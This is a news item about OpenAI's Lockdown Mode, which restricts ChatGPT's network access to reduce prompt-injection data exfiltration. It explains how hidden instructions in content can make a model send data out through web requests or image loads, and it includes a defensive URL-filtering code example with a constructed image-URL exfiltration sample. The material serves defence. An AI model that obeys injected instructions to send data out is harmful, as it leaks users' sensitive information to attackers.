OpenAI launches Lockdown Mode to block data exfiltration via prompt injection
OpenAI has launched Lockdown Mode, a new security feature for ChatGPT designed to reduce the risk of sensitive data being exfiltrated through prompt injection attacks. The feature is now rolling out to ChatGPT Business accounts and eligible personal accounts.
What's new
Lockdown Mode is an opt-in setting that constrains ChatGPT's external network access when handling sensitive workflows. When enabled, the following capabilities are disabled or restricted:
- Live web browsing — limited to cached content only; no live network requests leave OpenAI's controlled infrastructure
- Image retrieval from the web — disabled
- Deep Research (including shopping research) — disabled
- Agent Mode — disabled
- Canvas networking — disabled
- Live connectors — disabled
- File downloads — disabled
OpenAI is explicit about the intended audience: "Lockdown Mode is not intended for everyone. It is designed for people and organizations that handle sensitive data and want stricter protection from data exfiltration risks related to prompt injection."
Important caveat: Lockdown Mode does not prevent prompt injections from appearing in processed content. A malicious instruction embedded in cached web content or an uploaded file could still influence ChatGPT's behavior or response accuracy — the feature stops the exfiltration channel, not the injection itself.
Context
Prompt injection is an attack class where malicious instructions are hidden inside content that an AI model processes — a webpage, document, or email. A successful injection can cause a model to silently send sensitive information to an attacker-controlled destination through a web request, image load, or API call. Lockdown Mode closes those outbound channels while preserving cached web access.
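The distinction drawn above, closing the outbound channel rather than detecting the injection, can be shown with a filter over model output before it is rendered. This is an added example, not OpenAI's implementation of Lockdown Mode; the allowlisted host, the function names and the sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this deployment lets rendered output reference.
ALLOWED_HOSTS = {"docs.example.com"}

MD_REF = re.compile(r"(!?)\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")  # image or link
BARE_URL = re.compile(r"https?://[^\s)>]+", re.I)

def host_allowed(url, allowed=ALLOWED_HOSTS):
    """True only for http(s) URLs whose exact host is allowlisted."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").lower().rstrip(".")
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and host in allowed

def close_egress(text, allowed=ALLOWED_HOSTS):
    """Return (safe_text, blocked_urls) for one piece of model output."""
    blocked = []

    def fix_ref(m):
        is_image, label, url = m.groups()
        if host_allowed(url, allowed):
            return m.group(0)
        blocked.append(url)
        # An image is fetched on render with no click, so drop it entirely;
        # a link keeps only its visible text.
        return "[image removed]" if is_image else label

    def fix_bare(m):
        if host_allowed(m.group(0), allowed):
            return m.group(0)
        blocked.append(m.group(0))
        return "[link removed]"

    text = MD_REF.sub(fix_ref, text)
    return BARE_URL.sub(fix_bare, text), blocked

# Constructed sample: model output after processing a poisoned document.
SAMPLE = (
    "Summary of the contract is below.\n"
    "![status](https://collector.invalid/p.png?d=CONSTRUCTED)\n"
    "See [the guide](https://docs.example.com/guide) or "
    "[details](https://docs.example.com@collector.invalid/x)."
)

if __name__ == "__main__":
    safe, blocked = close_egress(SAMPLE)
    print(safe)
    print("blocked:", blocked)
```

The filter never inspects whether the text was injected; it only removes the destinations a renderer or user could send data to, and the returned list of blocked URLs gives a record suitable for logging.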
OpenAI has been developing what it calls the "Atlas" hardening initiative: a layered set of structural defenses against prompt injection in ChatGPT's agent and tool surfaces. Lockdown Mode is the first user-facing control tier built on top of those defenses, giving organizations a blunt but reliable way to trade feature breadth for reduced exfiltration exposure.
The rollout targets ChatGPT Business accounts and eligible personal accounts first.
Why it matters
This is one of the first user-configurable security tiers from a major AI provider specifically targeting the prompt injection threat class. For enterprises deploying ChatGPT in sensitive workflows — legal document review, financial analysis, competitive research — Lockdown Mode provides a concrete and auditable risk reduction layer, even if not a complete solution.
The candid acknowledgment that the mode limits exfiltration channels but does not eliminate prompt injection as a threat is notable. It reflects that OpenAI views prompt injection as a persistent, systemic problem rather than a bug to be patched, and is choosing transparency about residual risk over overclaiming protection. That posture will matter as AI agents become more autonomous and handle higher-stakes information.
Corroborating sources
- TechCrunch
https://techcrunch.com/2026/06/06/openai-unveils-lockdown-mode-to-protect-sensitive-data-from-prompt-injection-attacks/